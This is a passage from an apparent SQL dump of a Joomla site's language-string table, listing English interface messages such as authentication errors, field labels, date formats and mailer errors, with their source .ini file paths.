invalid.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1023,'JGLOBAL_AUTH_NO_BIND','Unable to bind to LDAP','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1024,'JGLOBAL_AUTH_NO_CONNECT','Unable to connect to LDAP server','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1025,'JGLOBAL_AUTH_NO_REDIRECT','Could not redirect to server: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1026,'JGLOBAL_AUTH_NO_USER','Username and password do not match or you do not have an account yet.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1027,'JGLOBAL_AUTH_NOT_CONNECT','Unable to connect to authentication service.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1028,'JGLOBAL_AUTH_NOT_CREATE_DIR','Could not create the FileStore folder %s. Please check the effective permissions.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1029,'JGLOBAL_AUTH_PASS_BLANK','LDAP can\'t have blank password','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1030,'JGLOBAL_AUTH_UNKNOWN_ACCESS_DENIED','Result Unknown. Access Denied','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1031,'JGLOBAL_AUTH_USER_BLACKLISTED','User is blacklisted.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1032,'JGLOBAL_AUTH_USER_NOT_FOUND','Unable to find user','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1033,'JGLOBAL_AUTO','Auto','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1034,'JGLOBAL_CATEGORY_NOT_FOUND','Category not found','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1035,'JGLOBAL_CENTER','Center','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1036,'JGLOBAL_CHECK_ALL','Check All Items','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1037,'JGLOBAL_CLICK_TO_SORT_THIS_COLUMN','Select to sort by this column','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1038,'JGLOBAL_COLLAPSE_CATEGORIES','Show less categories','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1039,'JGLOBAL_CREATED_DATE_ON','Created on %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1040,'JGLOBAL_CUSTOM_CATEGORY','New Categories','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1041,'JGLOBAL_DESCRIPTION','Description','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1042,'JGLOBAL_DISPLAY_NUM','Display #','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1043,'JGLOBAL_EDIT','Edit','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1044,'JGLOBAL_EDIT_TITLE','Edit article','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1045,'JGLOBAL_EMAIL','Email','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1046,'JGLOBAL_EMAIL_DOMAIN_NOT_ALLOWED','The email domain <strong>%s</strong> is not allowed. Please enter another email address.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1047,'JGLOBAL_EMAIL_TITLE','Email this link to a friend','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1048,'JGLOBAL_EXPAND_CATEGORIES','Show more categories','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1049,'JGLOBAL_FIELD_ADD','Add','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1050,'JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_DESC','Categories that are within this category will be displayed.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1051,'JGLOBAL_FIELD_CATEGORIES_CHOOSE_CATEGORY_LABEL','Select a Top Level Category','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1052,'JGLOBAL_FIELD_CATEGORIES_DESC_DESC','If you enter some text in this field, it will replace the Top Level Category Description, if it has one.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1053,'JGLOBAL_FIELD_CATEGORIES_DESC_LABEL','Alternative Description','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1054,'JGLOBAL_FIELD_CREATED_BY_ALIAS_DESC','Uses another name than the author\'s for display.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1055,'JGLOBAL_FIELD_CREATED_BY_ALIAS_LABEL','Author\'s Alias','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1056,'JGLOBAL_FIELD_CREATED_BY_DESC','The user who created this.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1057,'JGLOBAL_FIELD_CREATED_BY_LABEL','Created By','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1058,'JGLOBAL_FIELD_CREATED_DESC','Created Date.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1059,'JGLOBAL_FIELD_CREATED_LABEL','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1060,'JGLOBAL_FIELD_FEATURED_DESC','Assign the article to the featured blog layout.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1061,'JGLOBAL_FIELD_FEATURED_LABEL','Featured','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1062,'JGLOBAL_FIELD_FIELD_CACHETIME_DESC','The number of minutes before the cache is refreshed.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1063,'JGLOBAL_FIELD_FIELD_ORDERING_DESC','Order items will be displayed in.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1064,'JGLOBAL_FIELD_FIELD_ORDERING_LABEL','Order','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1065,'JGLOBAL_FIELD_GROUPS','Field Groups','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1066,'JGLOBAL_FIELD_ID_DESC','Record number in the database.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1067,'JGLOBAL_FIELD_ID_LABEL','ID','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1068,'JGLOBAL_FIELD_LAYOUT_DESC','Default layout to use for items.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1069,'JGLOBAL_FIELD_LAYOUT_LABEL','Choose a Layout','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1070,'JGLOBAL_FIELD_MODIFIED_LABEL','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1071,'JGLOBAL_FIELD_MODIFIED_BY_DESC','The user who did the last modification.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1072,'JGLOBAL_FIELD_MODIFIED_BY_LABEL','Modified By','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1073,'JGLOBAL_FIELD_MOVE','Move','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1074,'JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_DESC','Number of categories to display for each level.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1075,'JGLOBAL_FIELD_NUM_CATEGORY_ITEMS_LABEL','Number of Categories','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1076,'JGLOBAL_FIELD_PUBLISH_DOWN_DESC','An optional date to stop publishing.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1077,'JGLOBAL_FIELD_PUBLISH_DOWN_LABEL','Finish Publishing','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1078,'JGLOBAL_FIELD_PUBLISH_UP_DESC','An optional date to start publishing.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1079,'JGLOBAL_FIELD_PUBLISH_UP_LABEL','Start Publishing','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1080,'JGLOBAL_FIELD_REMOVE','Remove','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1081,'JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_DESC','Show description of the top level category or alternatively replace with the text from the description field found in the menu item. If using Root as a top level category, the description field has to be filled.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1082,'JGLOBAL_FIELD_SHOW_BASE_DESCRIPTION_LABEL','Top Level Category Description','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1083,'JGLOBAL_FIELD_VERSION_NOTE_DESC','Enter an optional note for this version of the item.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1084,'JGLOBAL_FIELD_VERSION_NOTE_LABEL','Version Note','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1085,'JGLOBAL_FILTER_BUTTON','Filter','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1086,'JGLOBAL_FILTER_LABEL','Filter','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1087,'JGLOBAL_FULL_TEXT','Full Text','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1088,'JGLOBAL_GT','>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1089,'JGLOBAL_HELPREFRESH_BUTTON','Refresh','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1090,'JGLOBAL_HITS','Hits','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1091,'JGLOBAL_HITS_ASC','Hits ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1092,'JGLOBAL_HITS_COUNT','Hits: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1093,'JGLOBAL_HITS_DESC','Hits descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1094,'JGLOBAL_ICON_SEP','|','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1095,'JGLOBAL_INHERIT','Inherit','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1096,'JGLOBAL_INTRO_TEXT','Intro Text','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1097,'JGLOBAL_KEEP_TYPING','Keep typing ...','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1098,'JGLOBAL_LEFT','Left','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1099,'JGLOBAL_LIST_ALIAS','(<span>Alias</span>: %s)','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1100,'JGLOBAL_LIST_ALIAS_NOTE','(<span>Alias</span>: %s, <span>Note</span>: %s)','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1101,'JGLOBAL_LOOKING_FOR','Looking for','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1102,'JGLOBAL_LT','<','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1103,'JGLOBAL_MAXIMUM_UPLOAD_SIZE_LIMIT','Maximum upload size: <strong>%s</strong>','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1104,'JGLOBAL_NEWITEMSLAST_DESC','New items default to the last position. Ordering can be changed after this item has been saved.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1105,'JGLOBAL_NO_MATCHING_RESULTS','No Matching Results','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1106,'JGLOBAL_NUM','#','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1107,'JGLOBAL_OTPMETHOD_NONE','Disable Two Factor Authentication','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1108,'JGLOBAL_PASSWORD','Password','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1109,'JGLOBAL_PASSWORD_RESET_REQUIRED','You are required to reset your password before proceeding.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1110,'JGLOBAL_PREVIEW_POSITION','<span>Position:</span> %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1111,'JGLOBAL_PREVIEW_STYLE','<span>Style:</span> %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1112,'JGLOBAL_PRINT','Print','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1113,'JGLOBAL_PRINT_TITLE','Print article < %s >','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1114,'JGLOBAL_RECORD_NUMBER','Record ID: %d','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1115,'JGLOBAL_REMEMBER_ME','Remember me','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1116,'JGLOBAL_REMEMBER_MUST_LOGIN','For security reasons you must login before editing your personal information.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1117,'JGLOBAL_RESOURCE_NOT_FOUND','Resource not found','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1118,'JGLOBAL_RIGHT','Right','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1119,'JGLOBAL_ROOT','Root','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1120,'JGLOBAL_SECRETKEY','Secret Key','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1121,'JGLOBAL_SECRETKEY_HELP','If you have enabled two factor authentication in your user account please enter your secret key. If you do not know what this means, you can leave this field blank.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1122,'JGLOBAL_SELECT_AN_OPTION','Select an option','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1123,'JGLOBAL_SELECT_NO_RESULTS_MATCH','No results match','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1124,'JGLOBAL_SELECT_SOME_OPTIONS','Select some options','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1125,'JGLOBAL_SORT_BY','Sort Table By:','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1126,'JGLOBAL_START_PUBLISH_AFTER_FINISH','Item start publishing date must be before finish publishing date','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1127,'JGLOBAL_SUBCATEGORIES','Subcategories','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1128,'JGLOBAL_SUBHEADING_DESC','Optional text to show as a subheading.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1129,'JGLOBAL_TITLE','Title','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1130,'JGLOBAL_TITLE_ASC','Title ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1131,'JGLOBAL_TITLE_DESC','Title descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1132,'JGLOBAL_TYPE_OR_SELECT_CATEGORY','Type or Select a Category','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1133,'JGLOBAL_TYPE_OR_SELECT_SOME_OPTIONS','Type or select some options','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1134,'JGLOBAL_TYPE_OR_SELECT_SOME_TAGS','Type or select some tags','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1135,'JGLOBAL_USE_GLOBAL','Use Global','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1136,'JGLOBAL_USE_GLOBAL_VALUE','Use Global (%s)','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1137,'JGLOBAL_USERNAME','Username','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1138,'JGLOBAL_VALIDATION_FORM_FAILED','Invalid form','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1139,'JGLOBAL_YOU_MUST_LOGIN_FIRST','Please login first','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1140,'JGRID_HEADING_ACCESS','Access','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1141,'JGRID_HEADING_ACCESS_ASC','Access ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1142,'JGRID_HEADING_ACCESS_DESC','Access descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1143,'JGRID_HEADING_ID','ID','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1144,'JGRID_HEADING_ID_ASC','ID ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1145,'JGRID_HEADING_ID_DESC','ID descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1146,'JGRID_HEADING_LANGUAGE','Language','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1147,'JGRID_HEADING_LANGUAGE_ASC','Language ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1148,'JGRID_HEADING_LANGUAGE_DESC','Language descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1149,'JGRID_HEADING_ORDERING_ASC','Ordering ascending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1150,'JGRID_HEADING_ORDERING_DESC','Ordering descending','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1151,'JLIB_DATABASE_ERROR_ADAPTER_MYSQL','The MySQL adapter \'mysql\' is not available.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1152,'JLIB_DATABASE_ERROR_ADAPTER_MYSQLI','The MySQL adapter \'mysqli\' is not available.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1153,'JLIB_DATABASE_ERROR_CONNECT_DATABASE','Unable to connect to the Database: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1154,'JLIB_DATABASE_ERROR_CONNECT_MYSQL','Could not connect to MySQL.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1155,'JLIB_DATABASE_ERROR_DATABASE_CONNECT','Could not connect to database','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1156,'JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER','Unable to load Database Driver: %s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1157,'JLIB_ERROR_INFINITE_LOOP','Infinite loop detected in JError','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1158,'JOPTION_DO_NOT_USE','- None Selected -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1159,'JOPTION_SELECT_ACCESS','- Select Access -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1160,'JOPTION_SELECT_AUTHOR','- Select Author -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1161,'JOPTION_SELECT_CATEGORY','- Select Category -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1162,'JOPTION_SELECT_LANGUAGE','- Select Language -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1163,'JOPTION_SELECT_PUBLISHED','- Select Status -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1164,'JOPTION_SELECT_MAX_LEVELS','- Select Max Levels -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1165,'JOPTION_SELECT_MONTH','- Select Month -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1166,'JOPTION_SELECT_TAG','- Select Tag -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1167,'JOPTION_USE_DEFAULT','- Use Default -','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1168,'JSEARCH_FILTER_CLEAR','Clear','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1169,'JSEARCH_FILTER_LABEL','Filter','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1170,'JSEARCH_FILTER_SUBMIT','Search','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1171,'JSEARCH_FILTER','Search','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1172,'DATE_FORMAT_LC','l, d F Y','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1173,'DATE_FORMAT_LC1','l, d F Y','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1174,'DATE_FORMAT_LC2','l, d F Y H:i','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1175,'DATE_FORMAT_LC3','d F Y','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1176,'DATE_FORMAT_LC4','Y-m-d','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1177,'DATE_FORMAT_LC5','Y-m-d H:i','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1178,'DATE_FORMAT_LC6','Y-m-d H:i:s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1179,'DATE_FORMAT_JS1','y-m-d','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1180,'DATE_FORMAT_CALENDAR_DATE','%Y-%m-%d','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1181,'DATE_FORMAT_CALENDAR_DATETIME','%Y-%m-%d %H:%M:%S','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1182,'DATE_FORMAT_FILTER_DATE','Y-m-d','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1183,'DATE_FORMAT_FILTER_DATETIME','Y-m-d H:i:s','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1184,'JANUARY_SHORT','Jan','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1185,'JANUARY','January','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1186,'FEBRUARY_SHORT','Feb','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1187,'FEBRUARY','February','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1188,'MARCH_SHORT','Mar','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1189,'MARCH','March','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1190,'APRIL_SHORT','Apr','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1191,'APRIL','April','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1192,'MAY_SHORT','May','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1193,'MAY','May','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1194,'JUNE_SHORT','Jun','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1195,'JUNE','June','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1196,'JULY_SHORT','Jul','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1197,'JULY','July','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1198,'AUGUST_SHORT','Aug','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1199,'AUGUST','August','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1200,'SEPTEMBER_SHORT','Sep','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1201,'SEPTEMBER','September','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1202,'OCTOBER_SHORT','Oct','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1203,'OCTOBER','October','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1204,'NOVEMBER_SHORT','Nov','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1205,'NOVEMBER','November','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1206,'DECEMBER_SHORT','Dec','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1207,'DECEMBER','December','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1208,'SAT','Sat','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1209,'SATURDAY','Saturday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1210,'SUN','Sun','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1211,'SUNDAY','Sunday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1212,'MON','Mon','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1213,'MONDAY','Monday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1214,'TUE','Tue','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1215,'TUESDAY','Tuesday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1216,'WED','Wed','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1217,'WEDNESDAY','Wednesday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1218,'THU','Thu','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1219,'THURSDAY','Thursday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1220,'FRI','Fri','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1221,'FRIDAY','Friday','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1222,'DECIMALS_SEPARATOR','.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1223,'THOUSANDS_SEPARATOR',',','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1224,'PHPMAILER_PROVIDE_ADDRESS','You must provide at least one recipient email address.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1225,'PHPMAILER_MAILER_IS_NOT_SUPPORTED','Mailer is not supported.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1226,'PHPMAILER_EXECUTE','Could not execute: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1227,'PHPMAILER_EXTENSION_MISSING','Extension missing: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1228,'PHPMAILER_INSTANTIATE','Could not start mail function.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1229,'PHPMAILER_AUTHENTICATE','SMTP Error! Could not authenticate.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1230,'PHPMAILER_FROM_FAILED','The following from address failed: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1231,'PHPMAILER_RECIPIENTS_FAILED','SMTP Error! The following recipients failed: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1232,'PHPMAILER_DATA_NOT_ACCEPTED','SMTP Error! Data not accepted.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1233,'PHPMAILER_CONNECT_HOST','SMTP Error! Could not connect to SMTP host.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1234,'PHPMAILER_FILE_ACCESS','Could not access file: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1235,'PHPMAILER_FILE_OPEN','File Error: Could not open file: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1236,'PHPMAILER_ENCODING','Unknown encoding: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1237,'PHPMAILER_SIGNING_ERROR','Signing error: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1238,'PHPMAILER_SMTP_ERROR','SMTP server error: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1239,'PHPMAILER_EMPTY_MESSAGE','Empty message body','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1240,'PHPMAILER_INVALID_ADDRESS','Invalid address','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1241,'PHPMAILER_VARIABLE_SET','Can\'t set or reset variable: ','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1242,'PHPMAILER_SMTP_CONNECT_FAILED','SMTP connect failed','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1243,'PHPMAILER_TLS','Could not start TLS','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1244,'MYSQL','MySQL','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1245,'MYSQLI','MySQLi','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1246,'ORACLE','Oracle','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1247,'PGSQL','PostgreSQL (PDO)','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1248,'PDOMYSQL','MySQL (PDO)','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1249,'POSTGRESQL','PostgreSQL','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1250,'SQLAZURE','Microsoft SQL Azure','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1251,'SQLITE','SQLite','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1252,'SQLSRV','Microsoft SQL Server','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1253,'JSEARCH_TOOLS','Search Tools','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1254,'JSEARCH_TOOLS_DESC','Filter the list items.','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1255,'JSEARCH_TOOLS_ORDERING','Order by:','/home/smthsmth/public_html/language/en-GB/en-GB.ini'),(1256,'LIB_FOF_DOWNLOAD_ERR_COULDNOTDOWNLOADFROMURL','Could not download from %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_f0f.ini'),(1257,'LIB_FOF_DOWNLOAD_ERR_COULDNOTWRITELOCALFILE','Local file %s is not writeable','/home/smthsmth/public_html/language/en-GB/en-GB.lib_f0f.ini'),(1258,'LIB_FOF_DOWNLOAD_ERR_CURL_ERROR','The download failed: cURL error %s: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_f0f.ini'),(1259,'LIB_FOF_DOWNLOAD_ERR_HTTPERROR','Unexpected HTTP status %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_f0f.ini'),(1260,'LIB_FOF_DOWNLOAD_ERR_COULDNOTDOWNLOADFROMURL','Could not download from %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof.ini'),(1261,'LIB_FOF_DOWNLOAD_ERR_COULDNOTWRITELOCALFILE','Local file %s is not writeable','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof.ini'),(1262,'LIB_FOF_DOWNLOAD_ERR_CURL_ERROR','The download failed: cURL error %s: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof.ini'),(1263,'LIB_FOF_DOWNLOAD_ERR_HTTPERROR','Unexpected HTTP status %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof.ini'),(1264,'LIB_FOF_XML_DESCRIPTION','Framework-on-Framework (FOF) - A rapid component development framework for Joomla!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof.sys.ini'),(1265,'LIB_FOF_DOWNLOAD_ERR_COULDNOTDOWNLOADFROMURL','Could not download from %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_fof30.ini'),(1266,'LIB_FOF_DOWNLOAD_ERR_COULDNOTWRITELOCALFILE','Local file %s is not 